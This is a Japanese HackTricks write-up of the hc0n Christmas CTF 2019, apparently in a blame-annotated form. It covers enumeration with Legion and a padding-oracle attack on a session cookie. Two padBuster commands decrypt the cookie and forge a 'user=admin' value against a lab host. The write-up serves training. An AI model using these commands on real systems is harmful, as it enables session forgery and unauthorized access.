2024-02-07 04:47:05 +00:00
|
|
|
|
# hc0n クリスマス CTF - 2019
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で会社を宣伝**してみたいですか?または、**PEASS の最新バージョンにアクセスしたり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
|
|
|
|
|
* [**公式の PEASS & HackTricks スワッグ**](https://peass.creator-spring.com) を手に入れましょう
|
|
|
|
|
* **[💬](https://emojipedia.org/speech-balloon/) Discord グループ**に**参加**するか、[**telegram グループ**](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** をフォロー**してください。
|
|
|
|
|
* **ハッキングトリックを共有するために、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) と [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud)** に PR を提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2022-05-01 16:17:23 +00:00
|
|
|
|
![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## 列挙
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
私は**ツール Legion**を使用してマシンを列挙し始めました:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 16:17:23 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (244).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
2 つのポートが開いています: 80 (**HTTP**) と 22 (**SSH**)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
Web ページでは**新しいユーザーを登録**することができ、**クッキーの長さが指定されたユーザー名の長さに依存**することに気づきました:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 16:17:23 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (245).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 16:17:23 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (246).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
そして、**クッキーの**いくつかの**バイト**を変更すると、このエラーが表示されます:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 16:17:23 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (247).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
この情報と[**パディングオラクル脆弱性の読み取り**](../../cryptography/padding-oracle-priv.md)により、それを悪用することができました:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
|
|
|
|
|
```
|
2024-02-07 04:47:05 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (248).png>)
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (249) (1).png>)
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
**ユーザーadminを設定します:**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
|
|
|
|
|
```
|
2022-05-01 16:17:23 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (250).png>)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-07 04:47:05 +00:00
|
|
|
|
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
|
|
|
|
|
* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
|
|
|
|
|
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
|
|
|
|
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|